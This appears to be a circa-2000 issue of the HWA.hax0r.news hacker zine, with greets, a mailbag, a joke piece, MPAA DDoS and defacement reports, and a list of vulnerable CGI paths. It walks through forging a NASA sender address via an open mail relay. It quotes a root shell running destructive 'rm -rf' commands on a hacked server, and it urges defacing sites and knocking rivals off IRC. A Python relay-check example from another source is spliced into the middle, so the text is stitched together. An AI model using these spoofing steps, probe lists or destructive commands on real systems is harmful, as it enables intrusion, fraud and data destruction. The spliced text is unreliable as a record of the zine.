I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD
** USE NO HOOKS **
Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or
form, unless they're good, fresh 0-day and on a fast site. <sic>
HWA.hax0r.news is now officially sponsored by the following entities:
HWA Internet Security
http://hwa-security.net/
CubeSoft Communications
http://www.csoft.net/
We strongly suggest Csoft for your hosting needs, tell them cruciphux
from HWA sent you. contact julien@csoft.net for details and check the
site for plans available.
Rights of sources included in our newsletter/zine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some sources and agencies impose unfair limitations and restrictions on
the use of their data, I do not generally ask permission to include the
articles from major media or other persons that have published material
on the net, imho this material is public domain.
Example:
"This material is subject to copyright and any unauthorised use, copying or
mirroring is prohibited. "
This notice will be disregarded we don't charge for access to these archives,
if anything we're doing the site(s) a favour by disseminating their news.
Legal action will result in a civil disobedience action and will incur
underground continuance of our zine.
cruciphux@dok.org
Cruciphux [C*:.] HWA/DoK Since 1989
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~ are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and
money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preferred chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@gmx.net......: currently active/programming/IRC+
pyra......................: currently active/crypto queen
Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
Armour (armour@bur.st)............: Australia
Wyze1.............................: South Africa
Xistence..........................: German/Dutch translations
Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form. Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
news events its a good idea to check out issue #1 at least and possibly
also the Xmas 99 issue for a good feel of what we're all about otherwise
enjoy - Ed ...
@HWA
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
New members/affiliates
Xistence ..... General news and Dutch/German translations
sP|a|Zm ..... Swedish news / translations
SugarKing ..... General news articles
* all the people who sent in cool emails and support
GREETS
~~~~~~
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs*
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
theduece ytcracker loophole BlkOps
MostHated vetesgirl Slash bob-
CHEVY* Debris pr1zm JimJones
Dragos Ruiu pr0xy MR^CHAOS senn
Fuqrag Messiah v00d00 meliksah
dinkee omnihil sP|a|Zm OE
KillNow iPulse erikR prizm
paluka Xistence doobee phold hi ;)
{} mixter merXor abattis
ashie diesl0w aus Julien/Csoft
b0f chappies DoK chappies and our HWA clan
DISSES?
~~~~~~~
You get the biggest dis of them all, your name(s) will not
even be mentioned here in the zine, you are nothing. You
know who you are, deal and squeal.
EoF
shouts to Xochitl13 for sending the cool postcard with a pic
of the la 2600 meeting place. cheers dude! btw your mailbox
is full ...
Folks from #hwa.hax0r.news and other leet secret channels,
*grin* - mad props! ... ;-)
And many others, sorry if i missed you or forgot you! mail
me and i'll flail myself unforgivingly in front of my open
bedroom window until I bleed, then maybe, add u to the list
(please, don't ask for pics...)
Also mad props to doobee and the CCC (Chaos Computer Club)
in Germany for setting up a new listserv system to help
distribute the zine. (Will be in action soon, I have admin
work to do first and testruns..).
:-)))
Ken Williams/tattooman ex-of PacketStorm,
SpaceRogue for running a kick ass news net
Emmanuel Goldstein for pure staying power
All the crackers, hackers and phreakers
The sysadmins, NOC controllers, network engineers
IRCops, security professionals, tiger team operatives
military cyberwar grunts, feds and 'special computer
unit' coppers trying to keep shit together in this
anarchic chaos.
AND
Kevin Mitnick (free at last, stay free this time man...)
Kevin was released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/
not familiar with his story? you should be, it affects us all
especially if you're in the U.S
-=-
kewl sites: Updated May/Jun 2000
Placement on list has no bearing of how "kewl" the sites are. :-p
+ http://hackdesk.dhs.org/
+ http://www.hack.co.za/ ** may be up, may be down... **
+ http://blacksun.box.sk/
+ http://packetstorm.securify.com/
+ http://www.securityportal.com/
+ http://www.securityfocus.com/
+ http://www.hackcanada.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://www.pure-security.net/
+ http://ech0.cjb.net/
+ http://www.r00tabega.com/
+ http://eeye.com/
+ http://ussrback.com/
+ http://el8.org/
+ http://adm.freelsd.net/
+ http://www.l0pht.com/
+ http://www.2600.com/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
Since we provide only the links in this section, be prepared
for 404's - Ed
+++ When was the last time you backed up your important data?
++ www.hack.co.za is back online (see elsewhere for story on gov-boi
and a tussle with phonic) (June 2000)
#darknet is current 'official' hack.co.za public IRC channel
it is generally open on EFnet, but sometimes closed due to
attacks from lamers with nothing better to do than disrupt IRC,
Thanks to myself for providing the info from my wired news feed and
others from whatever sources, Zym0t1c and also to Spikeman for sending
in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*** NEW WEB BOARD! ***
========================================================================
The message board has been REVIVED with a new script and is doing quite
well. Check it out
http://discserver.snap.com/Indices/103991.html
.
Don't be shy with your email, we do get mail, just not much of it
directed to other readers/the general readership. I'd really like to
see a 'readers mail' section. Send in questions on security, hacking
IDS, general tech questions or observations etc, hell we've even
printed poetry in the past when we thought it was good enough to
share.. - Ed
=======================================================================
* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~
(Didn't pull much from the board, check it out, some interesting
stuff on there... - Ed)
rst-: drskru@gmx.net
New Group SKRU for YOU!
Sun May 21 17:27:36 2000
New group now recruiting!
Fun hax0r group :)) must have a sense of humour
will skewl.
http://skru2k.tripod.com/skru/
EFnet
#Script-Kids-R-Us
:-)
See ya there, keep up the cool zine! bye....
-=-
note: this group has defaced several sites and mirrors can be seen
on Attrition.org, also channel is keyed. - Ed
-=-
A little late unfortunately but for your ref; - Ed
Lucian: lucjam@mindspring.com
TV film on script kiddies
Wed May 17 15:26:27 2000
Hi HWA,
Am working on a big new film about kid hackers / crackers / script kiddies
for British TV. Treating them not as anti-corporate heroes, or geniuses,
but as willful, cat burgling pranksters.
I need to find some contacts for hackers (and their admirers!) before the
end of this week...
This isn't some lame documentary exposing people, this is a cool story,
not a news expose, happy for anyone to be anonymous,
Am on to all the usual suspects, but any new stories leads would be really
appreciated.
thanks
Lucian
-=-
Unfortunately I didn't respond to this fella, I wonder who the 'usual
suspects' were ... hrm - Ed
-=-
SugarKing: sugarking2001@hotmail.com
2600 going too far?
Mon May 8 11:04:30 2000
2600 registers verizonREALLYsucks.com going after Verizon Wireless.
And before this fucknbc.com ? What are they trying to prove? Anyone
have anything to say about this? I'm thinking of writing an article
about it...give me some feedback.
SugarKing
-=-
allnet33
2600 going too far
Tue Jun 6 22:23:45 2000
I think 2600 is trying to challenge corporate america
every chance they get. They want to cause political
trouble just to keep things stirred up so that they
have something to write about.
-=-
Check board for other threads. Open up a convo...
@HWA
02.0 Words from the editor.
~~~~~~~~~~~~~~~~~~~~~
_____ _ _ _ _
| ____|__| (_) |_ ___ _ __( )__
| _| / _` | | __/ _ \| '__|/ __|
| |__| (_| | | || (_) | | \__ \
___|_____\__,_|_|\__\___/|_| |___/
/ ___| ___ __ _ _ __ | |__ _____ __
\___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
___) | (_) | (_| | |_) | |_) | (_) > <
|____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
|_|
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/* Its mostly been said in the two listbot mailing list news
* announcement msgs, however i'd like to point out that some
* items may fall outside the stated coverage period due to
* threading, these were left for clarity.
*
* I'd like to thank staff members and especially Pyra and
* Merxor, SugarKing, TP for their great help in getting this
* issue and #54 into shape, thanks guys!
*
* Also thanks to {}, JimJones, Slash and Prizm for other
* help and direction. *wink wink*
*
* Cruci-
*
* cruciphux@dok.org
* Preferred chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Anonymous email:
telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT
If you got that far everything is probably ok, otherwise you might see
550 cruciphux@dok.org... Relaying denied
or
550 admin@nasa.gov... Domain must exist
etc.
* This won't work on a server with up to date rule sets denying relaying and your
attempts will be logged so we don't suggest you actually use this method to
reach us, its probably also illegal (theft of service) so, don't do it. ;-)
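Added example (not part of the original zine): the server-side relay decision behind the "550 ... Relaying denied" reply above, showing that it depends on the connecting client's IP and the recipient domain, not on the claimed HELO or MAIL FROM, and that each rejection is recorded against the connecting address. The local domain list, relay network, client addresses and the domain-existence stub are assumptions made for this sketch; the reply strings follow the transcript.

```python
import ipaddress
from collections import Counter

# Assumptions for this sketch (not from the zine): the server is the final
# destination for one domain and relays only for one internal network.
LOCAL_DOMAINS = {"target.host.edu"}
RELAY_NETS = [ipaddress.ip_network("10.0.0.0/8")]
# Stand-in for the DNS lookup a real MTA performs on the sender's domain.
RESOLVABLE_DOMAINS = {"nasa.gov", "dok.org", "target.host.edu"}


def domain_of(address):
    """Return the lower-cased domain part of an envelope address."""
    local, at, domain = address.strip().strip("<>").rpartition("@")
    if not (local and at and domain):
        raise ValueError("not a mailbox: %r" % (address,))
    return domain.lower().rstrip(".")


def check_mail(mail_from, domain_exists):
    """MAIL FROM check: the sender domain must exist; ownership is never proven."""
    if not domain_exists(domain_of(mail_from)):
        return 550, "%s... Domain must exist" % mail_from
    return 250, "%s... Sender ok" % mail_from


def check_rcpt(client_ip, rcpt_to):
    """RCPT TO check: accept local recipients, relay only for trusted clients."""
    if domain_of(rcpt_to) in LOCAL_DOMAINS:
        return 250, "%s... Recipient ok" % rcpt_to
    client = ipaddress.ip_address(client_ip)
    if any(client in net for net in RELAY_NETS):
        return 250, "%s... Recipient ok" % rcpt_to
    return 550, "%s... Relaying denied" % rcpt_to


def handle_envelope(client_ip, mail_from, rcpt_to, reject_log,
                    domain_exists=RESOLVABLE_DOMAINS.__contains__):
    """Apply both checks and record every rejection against the connecting IP."""
    code, text = check_mail(mail_from, domain_exists)
    if code == 250:
        code, text = check_rcpt(client_ip, rcpt_to)
    if code != 250:
        reject_log.append({"client": client_ip, "from": mail_from,
                           "to": rcpt_to, "reply": text})
    return "%d %s" % (code, text)


def rejections_per_client(reject_log):
    """Count rejected envelopes per connecting address, for review or alerting."""
    return Counter(entry["client"] for entry in reject_log)


if __name__ == "__main__":
    log = []
    # Constructed envelopes; 203.0.113.7 stands for the proxy's address.
    sessions = [
        ("203.0.113.7", "admin@nasa.gov", "cruciphux@dok.org"),
        ("203.0.113.7", "admin@nasa.gov", "postmaster@target.host.edu"),
        ("10.1.2.3", "user@target.host.edu", "cruciphux@dok.org"),
        ("203.0.113.7", "admin@bogus.invalid", "cruciphux@dok.org"),
    ]
    for client, sender, rcpt in sessions:
        print(client, "->", handle_envelope(client, sender, rcpt, log))
    print(dict(rejections_per_client(log)))
```

The forged sender passes the MAIL FROM check because only the domain's existence is tested; the relay attempt fails at RCPT TO, and the log entry carries the proxy's address.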
-=-
Recent public posts to listbot mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Jun 13 2000 21:25:48 EDT
From: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
Subject: NEWS: HWA.hax0r.news is ALIVE!
Hi folks;
My apologies for the delay this time around, personal problems
and other work commitments have kept me from my hobby. This is
being remedied and things should pick up from here on in as we
get organized.
Here is some news for you.
HWA-security.net has been registered and will be hosted by our
good friends at Csoft (cheers Julien), check www.csoft.net for
your hosting/vhost needs. They know their shiat. Site is under
development and will be online soon.
Once again we're looking for new staff members or volunteers
to act as reporters, interviewers, news gatherers, file finders
etc. More details in release #53 which will be released this weekend
June 18th.
---> Email me at cruciphux@dok.org
** Issue #53 will be released June 18th and will cover material and
submissions from April 9th thru May 7th 2000.
** Issue #54 MAY be out this weekend also but I doubt it..we'll see
how busy things get around here, #54 will contain the recent news
and cover May 7th to present (release date). I will try my best to
get #53 and #54 out close to each others release dates, i'm doing it
this way to maintain coverage period per issue number.
<contd next message>
From: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
Subject: NEWS part 2: HWA.hax0r.news
HWA.hax0r.news - http://welcome.to/HWA.hax0r.news/
Hi again,
<cont'd part 2 of 2>
We appreciate your staying with us and giving us support, although
I'm largely doing this for selfish reasons and fun it is nice to
hear others getting off on it too, I've decided to expand operations
and offer more to the community.
I've decided to become more organized and have taken on a staff to
help with the production of the zine with an eye to keeping a more
timely release date and more reliable/quality production. If you
can help send me an email with a mini resume listing your talents
and areas you would be interested helping in.
** This is a non-profit venture. Sponsored by CUBESOFT. **
Yes we're doing it all for fun, like the old days :)
Many areas are open for you to offer help, think of this as a
fresh startup, what is it? a cross between Securityfocus, HNN
PacketStorm and the like. Sponsors are welcome, your donations
or ads will be redirected into the development of this project.
HWA-Security.net - Web site development, design, CGI, forums
programming, administration, forum admin, mailing list admin
PHP programming, java to proofreading and data collection.
Email me at cruciphux@dok.org with what you think you can do to
help or are interested in becoming a sponsor for this worthwhile
cause.
Mailing Address:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
SPONSORS, Commercial Advertising, Conference.
=============================================
Contact me for product advertising, or sponsorship details/offers
and we can work something out. I don't gouge and am looking to
work towards financing a new Canadian Con. CanCon 99 failed due
to lack of sponsorship/expertise in 1999, if you can help or offer
sponsorship, I want to hear from you.
Cruciphux@dok.org
Talk to us live
===============
Drop off news or just hang and idle or chat, don't forget to join us
on EFNet IRC #HWA.hax0r.news, if channel has a key then ..
/join #hwa.hax0r.news zwen
(key is zwen and if that does not work msg cruciphux i'm usually
online most days.)
Qualifications?
===============
I don't claim to know it all or be a mad skewled expert but am a 35 yr old
"old school" ex-hacker, currently certified Unix Admin, Linux Admin and
Internet Security Specialist... information doesn't necessarily want to be
$7.15
<no offence to Emmanuel/Eric>
Cheers
Cruciphux, (Steve Carpenter)
HWA Editor/Founder, DoK, b0f
b0f security
http://b0f.freebsd.lublin.pl/
=-=
Congrats, thanks, articles, news submissions and kudos to us at the
main address: cruciphux@dok.org complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
or ol' papasmurfs to 127.0.0.1,
private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Hacking your way into a girlie's heart, etc by: ch1ckie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
04/09/00
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[g0at] http://www.goat-advisory.org [g0at]
-=g0at media productions=-
((Hacking your way into a girlie's heart, etc))-((by: ch1ckie))
->Lesson One: Making Yourself Appear More Elite Than You Actually Are.
-In real life, or on IRC, the most important thing that a girlie looks for in a hax0r is
skill (she hopes it will move her up in the world), whether it is real skill (which is
hard to come by these days) or if its simply an elite host (hax0r@fbi.gov).
-To make yourself appear more elite than you actually are (or ever will be), the first
step is getting yourself an elite host (2845818@shellyeah.org probably won't cut it),
either by means of a shell, wingate, or bnc (and if you don't know of these things, just
tell the girl you admin some big network in your spare time and i'm sure she'll be
impressed).
-In all retrospect, most girlies don't know the difference between _you_ and the real
thing, so don't worry.
-Opposing popular use...to the majority of girlies, it is best not to use leet speak
(eye 4m 4 m45t0r hax0r); this will more often than not end up confusing them and leave
them bewildered. Thus, trying to impress them will prove useless. If you happen to have
a girl that knows 'leet speak', don't directly use this speak with her either, but use
it when she is in the premises ("y0 m4ng, u b3tt4 ch3ck y0s3lf b4 u wr3ck y0s3lf"). This
will undoubtedly make you appear more elite/phearful than you actually are.
-For those of you who are more 'skilled', deface webpages in the fair name of your
girlie... ("U R 0wned; mad props to my girlie"). This is a concept far beyond most
girlies, and seeing their name on www.yahoo.com proves very impressive.
A few other methods of making yourself appear elite:
-obtaining operator status in as many channels as possible, do whatever you can to do so...
suck dick, kiss ass, or stomp on some heads.
-pinging out her enemies on command will impress/delight her enough to have even cyber sex with
you... might wanna keep that in mind.
-using random 'big' words such as "heuristic control algorithm" or "pleisiochronous
communications" will be sure to impress... they do not even have to be in an order that makes
any sense. As long as your girlie hears 'big important words', she will believe that you are
elite...and the sad part is, that you will probably believe that you are too :(.
*Making yourself appear more elite than you actually are, is the first step to hacking your way
into a girlie's heart. Lesson two and three coming soon ('Making Your Girlie Feel Important',
and 'Understanding Your Girlie').*
[Shouts to my 'elite' gang in ftg ....Debris, nerp, potus, omega44, JimJones, and all the rest.]
"If only i could be as cool as you." - Silverchair
ch1ckie@ EFNet
ch1ckie.cjb.net
ch1ckie@hotmail.com
@HWA
04.0 [HWA] MPAA Site DoS'd off the net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th 2000
By: Cruciphux
Source: Anonymous (one of the persons involved contacted us directly on IRC)
Data: confirmed
http://www.mpaa.org has been down for nine hours or so as I write this;
several T1's were employed in a distributed DoS attack against the site.
Further information will be posted as I get it.
It is also rumoured that many sites affiliated with MPAA such as Tristar
will also be going down over the next week.
Some recent anti-MPAA defacements follow, the first site includes the
full UUencoded source code to DeCSS. (This site was censored by
Attrition for fear of reprimand from the MPAA. I believe this is a
first for Attrition in censoring defaced pages. - Ed)
http://www.safemode.org/mirror/2000/04/11/courtavenue_com/
<Screwloose Logo>
... fuck censorship! a focus on MPAA(sic).
You know one thing I am really brassed off about, and it has been going on since
so-called "civilisation" existed, is how censorship is controlling our lives. Governments
control people by the millions through forced religions, cults, and conspiracies while
ripping us off in the process. Enterprises and Government work hand in hand to
exploit the common people. Enterprises use Government as a tool to uphold
censorship and inevitably generate revenue for them, and likewise for the government
as they reap the taxes in return (that's why the US government won't take their finger
out of their ass, and split up Microsoft and other overbloated monopolies which are
very unethical with their business strategies). Hmm, I know what you're thinking "Isn't
the idea of a 'democratic' government supposed to let the common people control their
government, not the other way around?!?", yeah and you're completely right ....
fascism is still commonplace even today in 1st world countries.
Which brings me to the attention of MPAA (Motion Picture Association of America)
who are trying to control how we watch DVD's, where we watch them, who we watch
them with (does this include pets such as dust mites?!?), and what parts we watch. For
example "Are we allowed to skip their brainwashing advertisements and other shit for
which they want to control us with?". I feel paranoid when I have a friend watching a
DVD with me just in case I am breaking the law. LOL! :/. Where does censorship end?!
It's all DEEPLY psychological you know! MPAA have restrained the right for people to
write drivers for no computer operating system other than Microsoft's very own
"Windows" range, this means that you have to lose your precious uptimes of months
on your unix systems for a few hours of entertainment (hardly seems worth it).
"...and remember all visionaries are fascist bastards!" - ScrewLoose
Shouts go to...
BlazinWeed, phov0s/datawar, and other nigguhs who inspired me.
Here is the DeCSS code
This version of the code is for M$ Windows and is in the form of a ".dll"(dynamic link
library). It can decrypt any information stored on every DVD CD, yes it's the code that
MPAA don't want anyone just to pass it on OR EVEN LINK TO IT!!?!? I am deadly
serious. It makes you think "What are those mother fuckers got to hide?". You could
probably find a uu base64 decoder at davecentral for both Windows and Linux(if your
distribution doesn't come with a version already). See for yourself... . .
N.B. It is advised to rip this code straight from the HTML source to ensure
that it is decoded 100% properly.
BlaznWeed's recent hack:
http://www.attrition.org/mirror/attrition/2000/04/10/web1.carsacrossamerica.com/mirror.html
bash# uname -a ; w ;id
Linux web1.carsacrossamerica.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown
10:52pm up 11 days, 8:56, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 30Mar 0 11days 0.06s 0.02s -bash
cars pts/0 216.3.51.40 3:33pm 7:08m 0.05s 0.05s -bash
uid=0(root) gid=505(davem) groups=505(davem)
bash#rm -rf /var ; rm -rf /weblogs
sorry but i'm lazy :P
/*********************************************************************/
This mpaa issue has gone on long enough. We as a global community cannot afford to let america
control every aspect of our lives. This isn't just about copying DVD's this is about retaining our rights
to intellectual freedoms which the government of america will gladly allow the mpaa to violate. If I purchase
a dvd player I should have the right to do and/or view whatever I want on my private property. There
should be NO territorial lockout or encryption to stop me from using *my* property to its fullest.
The retarded excuse for territorial lockout given by the movie industry is that they are able to release
movies in countries at a time that would maximize their profits. The truth is however rather different
the reason territorial lockout exists on players is, so they can brainwash harry homeowner with their
own doctrine and minimize the possibility of foreign governments releasing materials which can be viewed
by harry homeowner that would change his/her mind about certain political issues.
I fully support 2600's stance against corporate bullies, if mpaa thinks they can wipeout decss by taking 2600
offline they got another thing coming.
download css-auth below for the source code to decss (unix only)
css-auth.tar
download decss.zip below if you're a windowz kid
decss.zip
-BlazinWeed
Shouts: everyone in wkD and everyone else that's down with me you know who you be
Fucks: mpaa (isn't that a surprise?), Freemasons and all you other bitches that slipped my mind
Attrition lamer of the week: Mcm4nus .. this kiddie is responsible for a truck load of hacks that say jack shit
"hacked by Mcm4nus " oh fuckin *pheer*.
kiddies please if you're going to deface something then at least fuckin say something.
the decss link above obviously won't work when the admin removes the file so I also
enclose the uuencode of the zip and tarball if you don't know how to decode these you suck.
[snip]
<censored by Attrition, see previous hack for full UUcode source - HWA>
@HWA
05.0 b0f:Common WWW and CGI vulnerabilities list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/cgi-bin/whois_raw.cgi
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test-cgi
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/php-cgi
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdispaly.cgi
/cgi-bin/perl.exe
/cgi-bin/bigconf.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/htsearch
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/get32.exe
/cgi-bin/man.sh
/cgi-bin/meta.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/maillist.pl
/cgi-bin/maillist.cgi
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger?@localhost
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/classified.cgi
/cgi-bin/environ.cgi
/cgi-bin/fpexplore.exe
/cgi-bin/imagemap.exe
/cgi-bin/cgitest.exe
/cgi-bin/anyboard.cgi
/cgi-bin/webbbs.cgi
/cgi-bin/visadmin.exe
/cgi-bin/nph-publish
/cgi-bin/perlshop.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/cachemgr.cgi
/cgi-bin/query
